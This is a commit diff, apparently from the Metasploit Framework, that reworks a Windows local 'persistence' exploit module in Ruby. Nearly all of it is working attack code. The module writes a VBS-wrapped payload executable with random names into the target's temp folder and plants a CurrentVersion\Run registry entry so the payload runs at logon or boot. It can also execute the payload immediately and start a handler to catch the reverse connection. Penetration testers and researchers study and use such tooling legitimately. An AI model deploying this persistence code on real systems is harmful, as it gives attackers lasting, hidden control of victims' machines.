persistence - more options, more verbose

...and less bugs!

+ Able to define the EXE payload filename
+ Able to setup a handler job
+ Able to execute persistence payload after installing
+ Performs various checks (should be more stable now)
+ Will display various warnings if your doing something 'different'
+ Added various verbose messages during the process

Author: g0tmi1k

modules/exploits/windows/local/persistence.rb

@@ -22,12 +22,11 @@ class Metasploit3 < Msf::Exploit::Local
 
   def initialize(info={})
     super( update_info( info,
-      'Name'          => 'Windows Manage Persistent Payload Installer',
+      'Name'          => 'Windows Persistent Registry Startup Payload Installer',
       'Description'   => %q{
-        This Module will create a boot persistent reverse Meterpreter session by
-        installing on the target host the payload as a script that will be executed
-        at user logon or system startup depending on privilege and selected startup
-        method.
+        This module will install a payload that is executed during boot.
+        It will be executed either at user logon or system startup via the registry
+        value in "CurrentVersion\Run" (depending on privilege and selected method).
       },
       'License'       => MSF_LICENSE,
       'Author'        =>
@@ -38,50 +37,117 @@ def initialize(info={})
       'SessionTypes'  => [ 'meterpreter' ],
       'Targets'       => [ [ 'Windows', {} ] ],
       'DefaultTarget' => 0,
-      'DisclosureDate'=> "Oct 19 2011"
+      'DisclosureDate'=> "Oct 19 2011",
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true',
+        }
     ))
 
     register_options(
       [
-        OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]),
-        OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
-        OptString.new('REXENAME',[false, 'The name to call payload on remote system.', nil]),
-        OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']),
-        OptString.new('PATH',[false, 'Path to write payload']),
+        OptInt.new('DELAY',
+          [true, 'Delay (in seconds) for persistent payload to keep reconnecting back.', 10]),
+        OptEnum.new('STARTUP',
+          [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
+        OptString.new('VBS_NAME',
+          [false, 'The filename to use for the VBS persistent script on the target host (%RAND% by default).', nil]),
+        OptString.new('EXE_NAME',
+          [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
+        OptString.new('REG_NAME',
+          [false, 'The name to call registry value for persistence on target host (%RAND% by default).', nil]),
+        OptString.new('PATH',
+          [false, 'Path to write payload (%TEMP% by default).', nil]),
+      ], self.class)
+
+    register_advanced_options([
+      OptBool.new('HANDLER',
+        [ false, 'Start an exploit/multi/handler job to receive the connection', false]),
+      OptBool.new('EXEC_AFTER',
+        [ false, 'Execute persistent script after installing.', false])
       ], self.class)
   end
 
-  # Exploit Method for when exploit command is issued
+  # Exploit method for when exploit command is issued
   def exploit
-    print_status("Running module against #{sysinfo['Computer']}")
+    print_status("Running persistent module against #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
 
-    rexename = datastore['REXENAME']
-    delay = datastore['DELAY']
-    reg_val = datastore['REG_NAME']
+    # Define default values
+    rvbs_name = datastore['VBS_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    rexe_name = datastore['EXE_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    reg_val   = datastore['REG_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    delay = datastore['DELAY'] || 10
+    exc_after = datastore['EXEC_AFTER'] || false
+    handler = datastore['HANDLER'] || false
     @clean_up_rc = ""
-    host,port = session.session_host, session.session_port
 
+    rvbs_name = rvbs_name + '.vbs' if rvbs_name[-4,4] != '.vbs'
+    rexe_name = rexe_name + '.exe' if rexe_name[-4,4] != '.exe'
+
+    # Connect to the session
+    begin
+      host, port = session.session_host, session.session_port
+    rescue => e
+      print_error("Could not connect to session")
+      return nil
+    end
+
+    # Check values
+    if (is_system?) && (datastore['STARTUP'] == 'USER')
+      print_warning('Note: Current user is SYSTEM & STARTUP == USER. This user may not login often!')
+    end
+
+    if (handler) && (!datastore['DisablePayloadHandler'])
+      # DisablePayloadHandler will stop listening after the script finishes - we want a job so it continues afterwards!
+      print_warning("Note: HANDLER == TRUE && DisablePayloadHandler == TRUE. This will create issues...")
+      print_warning("Disabling HANDLER...")
+      handler = false
+    end
+
+    # Generate the exe payload
+    print_status("Generating EXE payload (#{rexe_name})") if datastore['VERBOSE']
     exe = generate_payload_exe
-    script = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay})
-    script_on_target = write_script_to_target(script, rexename)
+    # Generate the vbs payload
+    print_status("Generating VBS persistent script (#{rvbs_name})") if datastore['VERBOSE']
+    vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})
+    # Writing the payload to target
+    print_status("Writing payload inside the VBS script on the target") if datastore['VERBOSE']
+    script_on_target = write_script_to_target(vbsscript, rvbs_name)
 
-    # exit the module because we failed to write the file on the target host.
+    # Exit the module because we failed to write the file on the target host
+    # Feedback has already been given to the user, via the function.
     return unless script_on_target
 
-    # Initial execution of script
-
+    # Initial execution of persistent script
     case datastore['STARTUP']
     when 'USER'
-      # if we could not write the entry in the registy we exit the module.
+      # If we could not write the entry in the registy we exit the module.
       return unless write_to_reg("HKCU", script_on_target, reg_val)
+      print_status("Payload will execute when USER (#{session.sys.config.getuid}) next logs on") if datastore['VERBOSE']
     when 'SYSTEM'
-      # if we could not write the entry in the registy we exit the module.
+      # If we could not write the entry in the registy we exit the module.
       return unless write_to_reg("HKLM", script_on_target, reg_val)
+      print_status("Payload will execute at the next SYSTEM startup") if datastore['VERBOSE']
+    else
+      print_error("Something went wrong. Invalid STARTUP method: #{datastore['STARTUP']}")
+      return nil
     end
 
+    # Do we setup a exploit/multi/handler job?
+    if handler
+      listener_job_id = create_multihandler(datastore['LHOST'], datastore['LPORT'], datastore['PAYLOAD'])
+      if listener_job_id.blank?
+        print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
+      end
+    end
+
+    # Do we execute the VBS script afterwards?
+    target_exec(script_on_target) if datastore['EXEC_AFTER']
+
+    # Create 'clean up' resource file
     clean_rc = log_file()
     file_local_write(clean_rc, @clean_up_rc)
-    print_status("Cleanup Meterpreter RC File: #{clean_rc}")
+    print_status("Clean up Meterpreter .RC file: #{clean_rc}")
 
     report_note(:host => host,
       :type => "host.persistance.cleanup",
@@ -98,86 +164,164 @@ def exploit
     )
   end
 
-  # Function for creating log folder and returning log path
-  def log_file(log_path = nil)
-    #Get hostname
-    host = session.sys.config.sysinfo["Computer"]
+  # Writes script to target host and returns the pathname of the target file or nil if the
+  # file could not be written.
+  def write_script_to_target(vbs, name)
+    filename = name || Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
+    temppath = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    filepath = temppath + "\\" + filename
 
-    # Create Filename info to be appended to downloaded files
-    filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+    if !directory? temppath
+      print_error("#{temppath} does not exists on the target")
+      return nil
+    end
 
-    # Create a directory for the logs
-    if log_path
-      logs = ::File.join(log_path, 'logs', 'persistence',
-                         Rex::FileUtils.clean_path(host + filenameinfo) )
-    else
-      logs = ::File.join(Msf::Config.log_directory, 'persistence',
-                         Rex::FileUtils.clean_path(host + filenameinfo) )
+    if file? filepath
+      print_warning("#{filepath} already exists on the target. Deleting...")
+      begin
+        file_rm(filepath)
+        print_good("Deleted #{filepath}")
+      rescue
+        print_error("Unable to delete file!")
+      end
     end
 
-    # Create the log directory
-    ::FileUtils.mkdir_p(logs)
+    begin
+      write_file(filepath, vbs)
+      print_good("Persistent VBS script written on #{sysinfo['Computer']} to #{filepath}")
 
-    #logfile name
-    logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
-    return logfile
+      # Escape windows pathname separators.
+      @clean_up_rc << "rm #{filepath.gsub(/\\/, '//')}\n"
+    rescue
+      print_error("Could not write the payload on the target")
+      # Return nil since we could not write the file on the target
+      filepath = nil
+    end
+
+    return filepath
   end
 
-  # Writes script to target host and returns the pathname of the target file or nil if the
-  # file could not be written.
-  def write_script_to_target(vbs, name)
-    tempdir = datastore['PATH'] || session.sys.config.getenv('TEMP')
-    unless name
-      tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
+  # Installs payload in to the registry HKLM or HKCU
+  def write_to_reg(key, script_on_target, registry_value)
+    regsuccess = true
+    nam = registry_value || Rex::Text.rand_text_alpha(rand(8)+8)
+    key_path = "#{key.to_s}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
+
+    print_status("Installing as #{key_path}\\#{nam}")
+
+    if key && registry_setvaldata(key_path, nam, script_on_target, "REG_SZ")
+      print_good("Installed autorun on #{sysinfo['Computer']} as #{key_path}\\#{nam}")
     else
-      tempvbs = tempdir + "\\" + name + ".vbs"
+      print_error("Failed to make entry in the registry for persistence")
+      regsuccess = false
     end
-    begin
-      write_file(tempvbs, vbs)
-      print_good("Persistent Script written to #{tempvbs}")
-      # Escape windows pathname separators.
-      @clean_up_rc << "rm #{tempvbs.gsub(/\\/, '//')}\n"
-    rescue
-      print_error("Could not write the payload on the target hosts.")
-      # return nil since we could not write the file on the target host.
-      tempvbs = nil
-    end
-    return tempvbs
+
+    return regsuccess
   end
 
+
   # Executes script on target and returns true if it was successfully started
   def target_exec(script_on_target)
     execsuccess = true
     print_status("Executing script #{script_on_target}")
-    # error handling for process.execute() can throw a RequestError in send_request.
+    # Lets give the target a few seconds to catch up...
+    sleep(3)
+
+    # Error handling for process.execute() can throw a RequestError in send_request.
     begin
       unless datastore['EXE::Custom']
         session.shell_command_token(script_on_target)
       else
         session.shell_command_token("cscript \"#{script_on_target}\"")
       end
     rescue
-      print_error("Failed to execute payload on target host.")
+      print_error("Failed to execute payload on target")
       execsuccess = false
     end
+
     return execsuccess
   end
 
-  # Installs payload in to the registry HKLM or HKCU
-  def write_to_reg(key, script_on_target, registry_value)
-    nam = registry_value || Rex::Text.rand_text_alpha(rand(8)+8)
-    key_path = "#{key.to_s}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
+  # Starts a exploit/multi/handler session
+  def create_multihandler(lhost, lport, payload_name)
+    pay = client.framework.payloads.create(payload_name)
+    pay.datastore['LHOST'] = lhost
+    pay.datastore['LPORT'] = lport
+    print_status('Starting exploit/multi/handler')
+    if !check_for_listener(lhost, lport)
+      # Set options for module
+      mh = client.framework.exploits.create('multi/handler')
+      mh.share_datastore(pay.datastore)
+      mh.datastore['WORKSPACE'] = client.workspace
+      mh.datastore['PAYLOAD'] = payload_name
+      mh.datastore['EXITFUNC'] = 'thread'
+      mh.datastore['ExitOnSession'] = true
+      # Validate module options
+      mh.options.validate(mh.datastore)
+      # Execute showing output
+      mh.exploit_simple(
+          'Payload'     => mh.datastore['PAYLOAD'],
+          'LocalInput'  => self.user_input,
+          'LocalOutput' => self.user_output,
+          'RunAsJob'    => true
+        )
 
-    print_status("Installing into autorun as #{key_path}\\#{nam}")
+      # Check to make sure that the handler is actually valid
+      # If another process has the port open, then the handler will fail
+      # but it takes a few seconds to do so.  The module needs to give
+      # the handler time to fail or the resulting connections from the
+      # target could end up on on a different handler with the wrong payload
+      # or dropped entirely.
+      select(nil, nil, nil, 5)
+      return nil if framework.jobs[mh.job_id.to_s].nil?
 
-    if key && registry_setvaldata(key_path, nam, script_on_target, "REG_SZ")
-      print_good("Installed into autorun as #{key_path}\\#{nam}")
-      return true
+      return mh.job_id.to_s
     else
-      print_error("Failed to make entry in the registry for persistence.")
+      print_error('A job is listening on the same local port')
+      return nil
     end
+  end
 
-    false
+  # Method for checking if a listener for a given IP and port is present
+  # will return true if a conflict exists and false if none is found
+  def check_for_listener(lhost, lport)
+    client.framework.jobs.each do |k, j|
+      if j.name =~ / multi\/handler/
+        current_id = j.jid
+        current_lhost = j.ctx[0].datastore['LHOST']
+        current_lport = j.ctx[0].datastore['LPORT']
+        if lhost == current_lhost && lport == current_lport.to_i
+          print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
+          return true
+        end
+      end
+    end
+    return false
+  end
+
+  # Function for creating log folder and returning log path
+  def log_file(log_path = nil)
+    # Get hostname
+    host = session.sys.config.sysinfo["Computer"]
+
+    # Create Filename info to be appended to downloaded files
+    filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+
+    # Create a directory for the logs
+    if log_path
+      logs = ::File.join(log_path, 'logs', 'persistence',
+                         Rex::FileUtils.clean_path(host + filenameinfo) )
+    else
+      logs = ::File.join(Msf::Config.log_directory, 'persistence',
+                         Rex::FileUtils.clean_path(host + filenameinfo) )
+    end
+
+    # Create the log directory
+    ::FileUtils.mkdir_p(logs)
+
+    # logfile name
+    logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
+    return logfile
   end
 
 end